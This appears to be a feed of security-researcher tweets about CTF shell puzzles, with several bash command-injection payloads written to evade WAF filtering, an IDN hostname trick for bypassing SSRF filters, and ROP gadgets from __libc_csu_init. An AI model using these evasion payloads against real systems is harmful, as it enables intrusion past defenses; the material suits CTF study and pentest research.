It was inspired by cool tasks about bash in CTFs:.minbashmaxfun in 34C3 CTF: only $()#!{}<',\.shjail in 33C3 CTF: lowercase letters, spaces, >.echoechoechoecho in Insomni'hack teaser 2019: uneasy limitations.

'id' in posix shell using only 15 different chars (mostly punctuation and digit 2):.__=$(:&&(${=})2>&$(($$==$$)))$(:)&&__=${__##*:???}&&__=${__%??}&&${__#???????????}${__%???????????}.

'uname -a' with some garbage on stderr:. (";uname$"I"F"S"-a;")2>&1|sh.

Tricky `uname -a` in posix shell:. IFS=,;A=uname,-a;$A. A=I;B=F;C=S;D=$(($A$B$C=1));${@:-uname1-a}. ${$:+uname$((I``F``S=1))-a}. Tested on bash/dash/busybox. For shell injection without spaces with WAF blocking $IFS. #RedTeam #pentest #bugbounty.

Finding in @fluxfingers' CTF: node.js' http client translates hostname "localhost.xn--" (internationalized domain name / IDN) into "localhost.". So the hostname may bypass some filter/WAF to get better SSRF.

Interesting interaction of scoping rules and exec in Python 3.8.2:.a = 2.def f(): exec('a = 1; print([ x for x in [ a ] ])').def g(): exec('a = 1; print([ a for x in [ a ] ])').f() # prints [1].g() # prints [2].

OCaml code 'let r = (let x = 1 and y = 2 in x + y);;' may be represented in Python very well abusing decorators:.@ apply.def r():. x = 1. y = 2. return x + y.

RT @jmp_AC: @phdays Thanks! Congratulations to all participants of #PHDays Best Reverser 2019! My writeup (in Russian). tl;dr: modify emu t….

RT @phdays: Take part in our #PHDays Best Reverser contest held from May 1 through 14 to demonstrate your skill at analyzing executable fil….

Some binaries have __libc_csu_init embedded. On x86-64, it has 2 gadgets (G1 & G2) to invoke slots with ROP:.G1:.mov rdx,r13.mov rsi,r14.mov edi,r15d.call QWORD PTR [r12+rbx*8].add rbx,0x1.cmp rbx,rbp.jne G1.add rsp,0x8.G2:.pop rbx.pop rbp.pop r12.pop r13.pop r14.pop r15.ret.

#PHDays 8 is coming on (May 15-16, Russia, Moscow). Meanwhile I posted a follow-up email for my talk about john-devkit given at @PHDays VI (2016).

RT @countuponsec: Intro to American Fuzzy Lop – Fuzzing with ASAN and beyond

RT @jmp_AC: @ZeroNights #HackQuest Day 6 Writeup (in Russian) tl;dr: fit read(0,buf,N) into one number for simplicity .

RT @ZeroNights: Day 6 is finished. The winners are: 1. @jmp_AC 2. smalukav 3. @__paulch.The last task is already started (prepared by @scho….